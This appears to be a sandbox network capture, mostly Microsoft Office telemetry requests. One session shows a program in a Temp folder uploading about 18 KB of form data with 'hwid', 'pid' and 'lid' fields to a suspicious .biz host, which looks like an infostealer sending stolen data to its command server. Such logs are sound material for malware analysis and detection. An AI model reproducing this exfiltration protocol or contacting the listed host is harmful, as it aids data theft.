2024-12-08 18:53:45 UTC	1369	IN	Data Raw: 69 30 35 38 4b 48 37 4f 66 74 41 4a 71 67 4f 44 53 69 4e 76 2f 57 43 77 36 39 30 61 63 41 54 6a 58 43 71 4b 37 45 36 67 48 6d 54 44 42 6d 47 78 78 78 73 72 6d 55 43 76 41 76 38 48 6e 77 61 35 45 55 6c 79 77 43 39 49 64 66 35 6c 62 70 66 5a 42 74 55 48 43 48 34 4b 58 45 6e 43 76 68 50 6b 52 5a 5a 43 48 7a 73 6a 4d 75 46 68 39 4c 34 49 47 32 78 4a 75 6e 30 66 70 6d 51 4b 72 43 39 70 6f 67 74 6b 53 46 37 4f 4b 6f 56 55 73 6b 4f 71 64 6c 4a 6e 71 48 54 73 79 39 78 65 53 43 6a 69 5a 43 72 33 71 54 2f 6f 54 32 6e 36 43 6d 46 46 64 38 38 4c 69 52 7a 36 58 6a 50 50 6a 31 62 78 65 61 6d 47 62 4e 76 63 66 66 6f 68 51 34 72 34 6e 6d 6b 48 55 5a 73 32 66 43 6e 61 68 6a 4b 46 75 63 35 43 71 6a 5a 36 43 69 6b 31 69 62 4b 49 65 7a 56 35 64 6d 45 6e 31 76 67 4c 36 54 39 Data Ascii: i058KH7OftAJqgODSiNv/WCw690acATjXCqK7E6gHmTDBmGxxxsrmUCvAv8Hnwa5EUlywC9Idf5lbpfZBtUHCH4KXEnCvhPkRZZCHzsjMuFh9L4IG2xJun0fpmQKrC9pogtkSF7OKoVUskOqdlJnqHTsy9xeSCjiZCr3qT/oT2n6CmFFd88LiRz6XjPPj1bxeamGbNvcffohQ4r4nmkHUZs2fCnahjKFuc5CqjZ6Cik1ibKIezV5dmEn1vgL6T9

Session ID	Source IP	Source Port	Destination IP	Destination Port
100	192.168.2.4	49873	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:46 UTC	192	OUT	GET /rules/rule701250v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:46 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:46 GMT Content-Type: text/xml Content-Length: 1358 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BE022ECC5" x-ms-request-id: 8eb9891a-501e-005b-7103-48d7f7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185346Z-r1cf579d778xr2r4hC1EWRqvfs00000006300000000092vh x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:46 UTC	1358	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
101	192.168.2.4	49874	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:46 UTC	192	OUT	GET /rules/rule700051v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:46 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:46 GMT Content-Type: text/xml Content-Length: 1389 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE10A6BC1" x-ms-request-id: 83446ce3-101e-0046-0a10-4891b0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185346Z-r1cf579d778v97q7hC1EWRf95c00000005pg00000000a5vm x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:46 UTC	1389	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="

Session ID	Source IP	Source Port	Destination IP	Destination Port
102	192.168.2.4	49875	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:46 UTC	192	OUT	GET /rules/rule700050v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:46 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:46 GMT Content-Type: text/xml Content-Length: 1352 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT ETag: "0x8DC582BE9DEEE28" x-ms-request-id: 1ec3a3fb-701e-0001-7303-48b110000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185346Z-r1cf579d778xq4f9hC1EWRx41g00000005w000000000bbq9 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:46 UTC	1352	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T

Session ID	Source IP	Source Port	Destination IP	Destination Port
103	192.168.2.4	49876	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:46 UTC	192	OUT	GET /rules/rule702951v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:46 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:46 GMT Content-Type: text/xml Content-Length: 1405 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE12B5C71" x-ms-request-id: fc2f82a1-a01e-006f-4f06-4813cd000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185346Z-r1cf579d778dc6d7hC1EWR2vs800000006vg000000003vgb x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:46 UTC	1405	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke

Session ID	Source IP	Source Port	Destination IP	Destination Port
104	192.168.2.4	49877	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:46 UTC	192	OUT	GET /rules/rule702950v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:46 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:46 GMT Content-Type: text/xml Content-Length: 1368 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT ETag: "0x8DC582BDDC22447" x-ms-request-id: e2bfbc9d-f01e-0085-0f03-4888ea000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185346Z-r1cf579d7788pwqzhC1EWRrpd800000006bg000000007w90 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:46 UTC	1368	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.4	49880	104.21.16.9	443	8128	C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:47 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=MSATCQC9BHDL User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18133 Host: atten-supporse.biz
2024-12-08 18:53:47 UTC	15331	OUT	Data Raw: 2d 2d 4d 53 41 54 43 51 43 39 42 48 44 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 38 33 42 39 45 39 32 32 41 37 31 36 46 31 30 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 4d 53 41 54 43 51 43 39 42 48 44 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4d 53 41 54 43 51 43 39 42 48 44 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 4d 53 41 54 43 51 43 39 Data Ascii: --MSATCQC9BHDLContent-Disposition: form-data; name="hwid"683B9E922A716F1023D904AF30EFEBBC--MSATCQC9BHDLContent-Disposition: form-data; name="pid"2--MSATCQC9BHDLContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--MSATCQC9
2024-12-08 18:53:47 UTC	2802	OUT	Data Raw: cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d Data Ascii: u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECa
2024-12-08 18:53:48 UTC	1022	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=7glglvsmrm29fmu4n9pt6gdns4; expires=Thu, 03-Apr-2025 12:40:27 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wkslHb6AqAFpEFGXpOUNdb8%2BTFqm8lT8VSbuaUyVJhT1%2F4ES%2BBs6plR4HGswl8ysjljzQ0175Jpt0pzBa4BRvqNuzmSYYJyfS2zsuGpTN67BsUhyAToi3W7ULTi49E3bmbmG%2BTI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8eeef5d769094309-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2051&min_rtt=1748&rtt_var=872&sent=10&recv=23&lost=0&retrans=0&sent_bytes=2845&recv_bytes=19091&delivery_rate=1670480&cwnd=232&unsent_bytes=0&cid=8c8e9118e069ffab&ts=1037&x=0"
2024-12-08 18:53:48 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a Data Ascii: fok 8.46.123.228
2024-12-08 18:53:48 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
106	192.168.2.4	49882	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:48 UTC	192	OUT	GET /rules/rule701150v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:49 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:48 GMT Content-Type: text/xml Content-Length: 1364 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE1223606" x-ms-request-id: 22946db9-b01e-0021-4e03-48cab7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185348Z-r1cf579d77867vg8hC1EWR8knc0000000600000000004hdh x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:49 UTC	1364	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
107	192.168.2.4	49881	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:48 UTC	192	OUT	GET /rules/rule701151v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:49 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:48 GMT Content-Type: text/xml Content-Length: 1401 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT ETag: "0x8DC582BE055B528" x-ms-request-id: 42c4dea6-f01e-0099-6c03-489171000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185348Z-r1cf579d778t5c2lhC1EWRce3w00000006sg000000008tz4 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:49 UTC	1401	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA

Session ID	Source IP	Source Port	Destination IP	Destination Port
108	192.168.2.4	49883	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:48 UTC	192	OUT	GET /rules/rule702201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:49 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:48 GMT Content-Type: text/xml Content-Length: 1397 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT ETag: "0x8DC582BE7262739" x-ms-request-id: 9a7d6e1d-d01e-00a1-4e08-4835b1000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185348Z-r1cf579d778w59f9hC1EWRze6w00000006dg000000004cx3 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:49 UTC	1397	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel

Session ID	Source IP	Source Port	Destination IP	Destination Port
109	192.168.2.4	49884	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:48 UTC	192	OUT	GET /rules/rule702200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:49 UTC	515	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:48 GMT Content-Type: text/xml Content-Length: 1360 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT ETag: "0x8DC582BDDEB5124" x-ms-request-id: 159c3d32-d01e-00ad-4e9c-49e942000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185348Z-r1cf579d778pftsbhC1EWRa0gn00000000tg000000000atc x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-12-08 18:53:49 UTC	1360	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">
